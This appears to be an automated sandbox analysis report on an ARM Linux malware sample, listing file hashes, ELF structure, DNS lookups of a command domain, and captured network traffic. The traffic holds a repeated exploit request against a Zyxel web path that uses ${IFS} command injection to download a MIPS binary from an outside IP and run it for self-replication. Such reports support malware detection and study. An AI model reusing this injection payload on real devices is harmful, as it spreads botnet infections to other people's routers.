                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        Process:/tmp/skyljnee.arm5-20240128-0910.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.411891879025521
                                                        Encrypted:false
                                                        SSDEEP:3:TgJIi9IX9zyocM2l:Tgk5xP2l
                                                        MD5:0CF3A417370F7A479A7E0353EE36C8FA
                                                        SHA1:654BF0BCD08558A9BB4F5A0ED0D64408C746EAF4
                                                        SHA-256:EBCD5AFE5E40F339A9C169ACDFBEEDA551F2509F953CD1221459792C892E2DED
                                                        SHA-512:95B834BBCCB4FD95F88783C67A424EC3E607B134A20DFE01C4B6193925207B47E92F9711F67062E5868CAE923C0C41FCF63062050EA8B71B3B54683B6833C5B6
                                                        Malicious:false
                                                        Preview:/tmp/skyljnee.arm5-20240128-0910.elf.
                                                        File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                        Entropy (8bit):5.543878804069322
                                                        TrID:
                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                        File name:skyljnee.arm5-20240128-0910.elf
                                                        File size:146'176 bytes
                                                        MD5:838b1b45aa0abcfc4a836f13bd4e0257
                                                        SHA1:95367365edc838facb78f316165b642837c87a8f
                                                        SHA256:83a34d93c076cc6293c338007527ed2f583f3f474df5b96d0cd4b6eef212ea3d
                                                        SHA512:52d19f656b28e4b46f6fdae1b8dcd97901a5a8f340787a377373321600b8120f77f0b5f7bc3aee4a695cf3d44407c91755c7d0a88ef6c6e6b6a25bd5e6eefb60
                                                        SSDEEP:3072:68KXZ8g1eeWU11EHH4l21G6FbmWs12SE8l:682esOn4l+G6F1sUSEC
                                                        TLSH:62E30945F8508B23C6C212BBFB5E428D3B2A57E8D3EE72039D255F64378A85B0E37546
                                                        File Content Preview:.ELF...a..........(.........4...p9......4. ...(.....................t...t...........................0I..D...........Q.td..................................-...L."...um..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                        ELF header

                                                        Class:ELF32
                                                        Data:2's complement, little endian
                                                        Version:1 (current)
                                                        Machine:ARM
                                                        Version Number:0x1
                                                        Type:EXEC (Executable file)
                                                        OS/ABI:ARM - ABI
                                                        ABI Version:0
                                                        Entry Point Address:0x8190
                                                        Flags:0x2
                                                        ELF Header Size:52
                                                        Program Header Offset:52
                                                        Program Header Size:32
                                                        Number of Program Headers:3
                                                        Section Header Offset:145776
                                                        Section Header Size:40
                                                        Number of Section Headers:10
                                                        Header String Table Index:9
                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                        NULL0x00x00x00x00x0000
                                                        .initPROGBITS0x80940x940x180x00x6AX004
                                                        .textPROGBITS0x80b00xb00x1b60c0x00x6AX0016
                                                        .finiPROGBITS0x236bc0x1b6bc0x140x00x6AX004
                                                        .rodataPROGBITS0x236d00x1b6d00x2da40x00x2A004
                                                        .ctorsPROGBITS0x2f0000x1f0000xc0x00x3WA004
                                                        .dtorsPROGBITS0x2f00c0x1f00c0x80x00x3WA004
                                                        .dataPROGBITS0x2f0200x1f0200x49100x00x3WA0032
                                                        .bssNOBITS0x339300x239300x46140x00x3WA004
                                                        .shstrtabSTRTAB0x00x239300x3e0x00x0001
                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                        LOAD0x00x80000x80000x1e4740x1e4746.10010x5R E0x8000.init .text .fini .rodata
                                                        LOAD0x1f0000x2f0000x2f0000x49300x8f440.41000x6RW 0x8000.ctors .dtors .data .bss
                                                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 28, 2024 10:11:58.816452980 CET192.168.2.148.8.8.80x7eb9Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:00.588813066 CET192.168.2.148.8.8.80xc1ceStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:02.363389969 CET192.168.2.148.8.8.80x1460Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:10.133471966 CET192.168.2.148.8.8.80x43bfStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:14.895498037 CET192.168.2.148.8.8.80x8b99Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:25.650322914 CET192.168.2.148.8.8.80x65cStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:28.412050009 CET192.168.2.148.8.8.80xd07Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:34.181056023 CET192.168.2.148.8.8.80xcc23Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:40.944015980 CET192.168.2.148.8.8.80x4a1cStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:42.691451073 CET192.168.2.148.8.8.80xd5d7Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:47.478286028 CET192.168.2.148.8.8.80x71cdStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:56.221985102 CET192.168.2.148.8.8.80x78c0Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:57.966717958 CET192.168.2.148.8.8.80xd3d1Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:00.736391068 CET192.168.2.148.8.8.80x6c47Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:03.505497932 CET192.168.2.148.8.8.80x829dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:13.277432919 CET192.168.2.148.8.8.80x23afStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:21.031192064 CET192.168.2.148.8.8.80x858fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:26.776583910 CET192.168.2.148.8.8.80x61b4Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:30.531270027 CET192.168.2.148.8.8.80x7b44Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:37.279112101 CET192.168.2.148.8.8.80x7e1Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:45.029164076 CET192.168.2.148.8.8.80xbafStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:54.791073084 CET192.168.2.148.8.8.80xf591Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:57.544367075 CET192.168.2.148.8.8.80x6d73Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:14:02.290038109 CET192.168.2.148.8.8.80xfc3bStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 28, 2024 10:11:58.920512915 CET8.8.8.8192.168.2.140x7eb9No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:00.692327023 CET8.8.8.8192.168.2.140xc1ceNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:02.466886997 CET8.8.8.8192.168.2.140x1460No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:10.237509012 CET8.8.8.8192.168.2.140x43bfNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:15.000247955 CET8.8.8.8192.168.2.140x8b99No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:25.754092932 CET8.8.8.8192.168.2.140x65cNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:28.515991926 CET8.8.8.8192.168.2.140xd07No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:34.284724951 CET8.8.8.8192.168.2.140xcc23No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:41.047667980 CET8.8.8.8192.168.2.140x4a1cNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:42.794989109 CET8.8.8.8192.168.2.140xd5d7No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:47.582041025 CET8.8.8.8192.168.2.140x71cdNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:56.325925112 CET8.8.8.8192.168.2.140x78c0No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:12:58.070386887 CET8.8.8.8192.168.2.140xd3d1No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:00.839806080 CET8.8.8.8192.168.2.140x6c47No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:03.608987093 CET8.8.8.8192.168.2.140x829dNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:13.381057978 CET8.8.8.8192.168.2.140x23afNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:21.135303020 CET8.8.8.8192.168.2.140x858fNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:26.880013943 CET8.8.8.8192.168.2.140x61b4No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:30.635102987 CET8.8.8.8192.168.2.140x7b44No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:37.382863998 CET8.8.8.8192.168.2.140x7e1No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:45.132503033 CET8.8.8.8192.168.2.140xbafNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:54.894299984 CET8.8.8.8192.168.2.140xf591No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:13:57.648190975 CET8.8.8.8192.168.2.140x6d73No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Jan 28, 2024 10:14:02.393513918 CET8.8.8.8192.168.2.140xfc3bNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.1451272182.36.236.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.867492914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192.168.2.1435864107.14.4.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.867717028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192.168.2.1451618155.63.248.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.867820024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.145233636.140.161.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.867882013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192.168.2.143949654.114.21.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.867969036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192.168.2.144388275.73.244.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868037939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192.168.2.145442278.29.137.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868130922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192.168.2.145185867.109.28.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868187904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192.168.2.1438918205.183.180.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868340969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192.168.2.143715872.57.71.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868443012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192.168.2.1455106142.61.135.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868446112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11192.168.2.1456844123.180.15.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868545055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192.168.2.144963296.83.66.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868647099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192.168.2.1446320158.182.210.44443
                                                        TimestampBytes transferredDirectionData
